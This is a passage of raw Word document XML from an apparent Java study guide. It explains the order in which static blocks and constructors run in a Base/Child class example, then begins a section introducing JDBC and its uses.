          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>As before, the Base constructor is called first, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECBFFAB" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Base Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131C1193" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Child Constructor Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DAEEB3" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>After the Base constructor, the Child constructor is executed, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080408A5" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Child Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC5D96" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Final Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F0D72" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The final output of the program will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23B2F7" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Base Static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6095A4CA" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Child Static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DFCB46" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Base Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8619DE" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Child Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B2088" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Base Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BD4CE" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Child Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F9CAF" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detailed Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610AA1BD" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static Blocks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBCA64" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static blocks in classes are executed once when the class is loaded. Since the Base class is loaded first (due to inheritance in Child), the Base static block executes first, followed by the Child static block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C04C66" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Constructor Calls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433FB873" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When an object is created, the constructor of the parent class (Base) is called first. After that, the constructor of the child class (Child) is called. This happens for both object creations (child1 and child2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93F3FB" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No Static Blocks in Constructor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D03ED15" w14:textId="77777777" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="00C975C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static blocks are executed only once, during class loading, not during object creation. Therefore, the static blocks in Base and Child execute only once, at the start of the program, while the constructors execute each time a new object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3017E0" w14:textId="2E8A3E71" w:rsidR="000133E9" w:rsidRPr="00EC1219" w:rsidRDefault="004E7A22" w:rsidP="000133E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="48B3A33D">
          <v:rect id="_x0000_i3667" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0D055" w14:textId="77777777" w:rsidR="00A4327D" w:rsidRDefault="00A4327D" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBFE842" w14:textId="77777777" w:rsidR="00A4327D" w:rsidRPr="00F851C0" w:rsidRDefault="00A4327D" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A04066C" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAFA067" w14:textId="14EEF8A6" w:rsidR="008A25EB" w:rsidRPr="00CE4B95" w:rsidRDefault="008A25EB" w:rsidP="003E4B77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B76FE" w14:textId="31412CBD" w:rsidR="00C24B91" w:rsidRPr="00CE4B95" w:rsidRDefault="00C24B91" w:rsidP="00C24B91">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="307" w:name="_Toc196307787"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>JDBC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="307"/>
    </w:p>
    <w:p w14:paraId="2AD6346B" w14:textId="77777777" w:rsidR="0041174E" w:rsidRPr="00CE4B95" w:rsidRDefault="0041174E" w:rsidP="0041174E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="308" w:name="_Toc196307788"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is JDBC?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="308"/>
    </w:p>
    <w:p w14:paraId="59BC5AFA" w14:textId="523EE335" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDBC (Java Database Connectivity)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an API (Application Programming Interface) in Java that allows Java applications to interact with databases in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standard and database-independent</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB0A3B" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="00000000" w:rsidP="00EC121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DAF6140">
          <v:rect id="_x0000_i1892" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC43202" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why JDBC?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF2F85" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3"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To perform:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8EF562" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1278"/>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Connection with a database (like MySQL, Oracle, PostgreSQL, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036871F1" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1278"/>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Executing SQL queries (SELECT, INSERT, UPDATE, DELETE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7ED03" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1278"/>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Retrieving and processing results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C6A59" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="00000000" w:rsidP="00EC121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C32AAF2">
          <v:rect id="_x0000_i1893" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408C581" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> JDBC Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DB24B" w14:textId="77777777" w:rsidR="009544C3" w:rsidRPr="00EC1219" w:rsidRDefault="009544C3" w:rsidP="00EC1219">
      <w:pPr>
        <w:numPr>
